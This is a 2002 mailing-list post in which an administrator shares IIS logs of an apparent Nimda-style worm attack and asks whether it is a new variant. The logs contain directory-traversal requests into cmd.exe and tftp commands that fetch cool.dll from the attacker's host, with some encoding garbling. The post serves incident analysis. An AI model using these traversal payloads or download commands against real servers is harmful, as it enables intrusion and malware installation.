Security Incidents mailing list archives
Another Nimda attack??
From: "Eugene Chua Yew Gin" <chuayg () 1-net com sg>
Date: Tue, 17 Sep 2002 17:42:37 +0800
Hi, need some advice for the below log, can anyone advice if its are a pattern of Nimda which I find it rather strange because it downloads cool.dll and httpodbc.dll instead of Admin.dll. Norton Antivirus reported a W32.Nimda.E@MM (dr) virus, is it a new variant?? Thanks and regards. 2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 - 2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 - 2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 - 2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20 cool.dll%20c:\httpodbc.dll 502 - 2002-09-16 07:54:24 202.100.249.231 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 - 2002-09-16 07:54:51 202.100.249.231 - 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 - 2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500 - 2002-09-16 07:54:53 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 - 2002-09-16 07:54:54 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 - 2002-09-16 07:54:54 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 - 2002-09-16 07:54:55 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 - 2002-09-16 07:54:55 202.100.249.231 - 80 GET /_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 - 2002-09-16 07:54:55 202.100.249.231 - 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:54:57 202.100.249.231 - 80 GET /msadc/..%5c../..%5c../..%5c/..
Á
../..
Á
../..
Á
../winnt/system32/cmd.exe /c+dir 403 - 2002-09-16 07:54:57 202.100.249.231 - 80 GET /scripts/..
Á
../winnt/system32/cmd.exe /c+dir 500 - 2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - 2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Another Nimda attack?? Eugene Chua Yew Gin (Sep 17)
- Re: Another Nimda attack?? Roger Thompson (Sep 18)